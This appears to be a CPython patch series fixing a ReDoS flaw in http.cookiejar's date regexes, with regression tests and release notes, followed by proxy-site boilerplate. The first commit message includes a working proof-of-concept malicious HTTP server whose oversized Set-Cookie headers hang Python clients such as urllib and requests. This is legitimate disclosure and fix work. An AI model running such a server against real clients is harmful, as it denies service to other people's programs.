From ecf7b84257ca680db7519d55b8c0edca845622ab Mon Sep 17 00:00:00 2001 From: bcaller Date: Thu, 14 Nov 2019 22:58:20 +0000 Subject: [PATCH 1/6] bpo-38804: Fix REDoS in http.cookiejar The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular expression denial of service (REDoS). LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar to parse Set-Cookie headers returned by a server. Processing a response from a malicious HTTP server can lead to extreme CPU usage and execution will be blocked for a long time. The regex contained multiple overlapping \s* capture groups. Ignoring the ?-optional capture groups the regex could be simplified to \d+-\w+-\d+(\s*\s*\s*)$ Therefore, a long sequence of spaces can trigger bad performance. Matching a malicious string such as LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!") caused catastrophic backtracking. The fix removes ambiguity about which \s* should match a particular space. You can create a malicious server which responds with Set-Cookie headers to attack all python programs which access it e.g. from http.server import BaseHTTPRequestHandler, HTTPServer def make_set_cookie_value(n_spaces): spaces = " " * n_spaces expiry = f"1-c-1{spaces}!" return f"b;Expires={expiry}" class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(204) self.send_response_only(204) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65506 # Max header line length 65536 ) value = make_set_cookie_value(n_spaces) for i in range(99): # Not necessary, but we can have up to 100 header lines self.send_header("Set-Cookie", value) self.end_headers() if __name__ == "__main__": HTTPServer(("", 44020), Handler).serve_forever() This server returns 99 Set-Cookie headers. Each has 65506 spaces. Extracting the cookies will pretty much never complete. Vulnerable client using the example at the bottom of https://docs.python.org/3/library/http.cookiejar.html : import http.cookiejar, urllib.request cj = http.cookiejar.CookieJar() opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) r = opener.open("http://localhost:44020/") The popular requests library was also vulnerable without any additional options (as it uses http.cookiejar by default): import requests requests.get("http://localhost:44020/") --- Lib/http/cookiejar.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/Lib/http/cookiejar.py b/Lib/http/cookiejar.py index adc7ed62425d06..409eb865a0b378 100644 --- a/Lib/http/cookiejar.py +++ b/Lib/http/cookiejar.py @@ -214,10 +214,14 @@ def _str2time(day, mon, yr, hr, min, sec, tz): (?::(\d\d))? # optional seconds )? # optional clock \s* - ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone + (?: + ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+) # timezone + \s* + )? + (?: + \(\w+\) # ASCII representation of timezone in parens. \s* - (?:\(\w+\))? # ASCII representation of timezone in parens. - \s*$""", re.X | re.ASCII) + )?$""", re.X | re.ASCII) def http2time(text): """Returns time in seconds since epoch of time represented by a string. From 92f46027a84ea13aadc821d7a6ff69c3f61c713d Mon Sep 17 00:00:00 2001 From: "blurb-it[bot]" <43283697+blurb-it[bot]@users.noreply.github.com> Date: Fri, 15 Nov 2019 00:54:42 +0000 Subject: [PATCH 2/6] =?UTF-8?q?=F0=9F=93=9C=F0=9F=A4=96=20Added=20by=20blu?= =?UTF-8?q?rb=5Fit.?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst | 1 + 1 file changed, 1 insertion(+) create mode 100644 Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst diff --git a/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst b/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst new file mode 100644 index 00000000000000..26f39311e91b6e --- /dev/null +++ b/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst @@ -0,0 +1 @@ +Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. \ No newline at end of file From 04a3c611563a5fe36bbc83c0d4315a64d73d5847 Mon Sep 17 00:00:00 2001 From: bcaller Date: Fri, 15 Nov 2019 11:49:29 +0000 Subject: [PATCH 3/6] Regression test for http.cookiejar REDoS If we regress, this test will take a very long time. --- Lib/test/test_http_cookiejar.py | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/Lib/test/test_http_cookiejar.py b/Lib/test/test_http_cookiejar.py index 853a40044965b1..c2c9c14d9df0b7 100644 --- a/Lib/test/test_http_cookiejar.py +++ b/Lib/test/test_http_cookiejar.py @@ -123,6 +123,13 @@ def test_http2time_garbage(self): "http2time(%s) is not None\n" "http2time(test) %s" % (test, http2time(test))) + def test_http2time_redos_regression_actually_completes(self): + # LOOSE_HTTP_DATE_RE was vulnerable to malicious input which caused catastrophic backtracking (REDoS). + # If we regress to cubic complexity, this test will take a very long time to succeed. + # If fixed, it should complete within a fraction of a second. + http2time("01 Jan 1970{}00:00:00 GMT!".format(" " * 10 ** 5)) + http2time("01 Jan 1970 00:00:00{}GMT!".format(" " * 10 ** 5)) + def test_iso2time(self): def parse_date(text): return time.gmtime(iso2time(text))[:6] From e11dfbeca5f4921289fd93379bb48544ae6b1e53 Mon Sep 17 00:00:00 2001 From: bcaller Date: Fri, 15 Nov 2019 12:03:48 +0000 Subject: [PATCH 4/6] Improve performance of http.cookiejar.ISO_DATE_RE A string like "444444" + (" " * 2000) + "A" could cause poor performance due to the 2 overlapping \s* groups, although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was. --- Lib/http/cookiejar.py | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/Lib/http/cookiejar.py b/Lib/http/cookiejar.py index 409eb865a0b378..47ed5c3d64ab7d 100644 --- a/Lib/http/cookiejar.py +++ b/Lib/http/cookiejar.py @@ -291,9 +291,11 @@ def http2time(text): (?::?(\d\d(?:\.\d*)?))? # optional seconds (and fractional) )? # optional clock \s* - ([-+]?\d\d?:?(:?\d\d)? - |Z|z)? # timezone (Z is "zero meridian", i.e. GMT) - \s*$""", re.X | re. ASCII) + (?: + ([-+]?\d\d?:?(:?\d\d)? + |Z|z) # timezone (Z is "zero meridian", i.e. GMT) + \s* + )?$""", re.X | re. ASCII) def iso2time(text): """ As for http2time, but parses the ISO 8601 formats: From bc4306398269d1e76bf1be11c748b5c02bcd3a12 Mon Sep 17 00:00:00 2001 From: bcaller Date: Fri, 15 Nov 2019 19:33:28 +0000 Subject: [PATCH 5/6] Test for ISO_DATE_RE sub-quadratic performance --- Lib/test/test_http_cookiejar.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/Lib/test/test_http_cookiejar.py b/Lib/test/test_http_cookiejar.py index c2c9c14d9df0b7..2d7077af6da39e 100644 --- a/Lib/test/test_http_cookiejar.py +++ b/Lib/test/test_http_cookiejar.py @@ -187,6 +187,12 @@ def test_iso2time_garbage(self): self.assertIsNone(iso2time(test), "iso2time(%r)" % test) + def test_iso2time_performance_regression(self): + # If ISO_DATE_RE regresses to quadratic complexity, this test will take a very long time to succeed. + # If fixed, it should complete within a fraction of a second. + iso2time('1994-02-03{}14:15:29 -0100!'.format(' '*10**6)) + iso2time('1994-02-03 14:15:29{}-0100!'.format(' '*10**6)) + class HeaderTests(unittest.TestCase): From 11fd815d180c5c58ac4beec1133c32267b15e87c Mon Sep 17 00:00:00 2001 From: bcaller Date: Sat, 16 Nov 2019 23:53:40 +0000 Subject: [PATCH 6/6] Update News / Acks Co-Authored-By: Serhiy Storchaka --- Misc/ACKS | 1 + .../next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/Misc/ACKS b/Misc/ACKS index 13c6676bace1fb..357ce024e9e8c7 100644 --- a/Misc/ACKS +++ b/Misc/ACKS @@ -250,6 +250,7 @@ Zach Byrne Vedran Čačić Nicolas Cadou Jp Calderone +Ben Caller Arnaud Calmettes Daniel Calvelo Tony Campbell diff --git a/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst b/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst index 26f39311e91b6e..1f45142d9f7437 100644 --- a/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst +++ b/Misc/NEWS.d/next/Security/2019-11-15-00-54-42.bpo-38804.vjbM8V.rst @@ -1 +1 @@ -Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. \ No newline at end of file +Fixes a ReDoS vulnerability in :mod:`http.cookiejar`. Patch by Ben Caller. pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy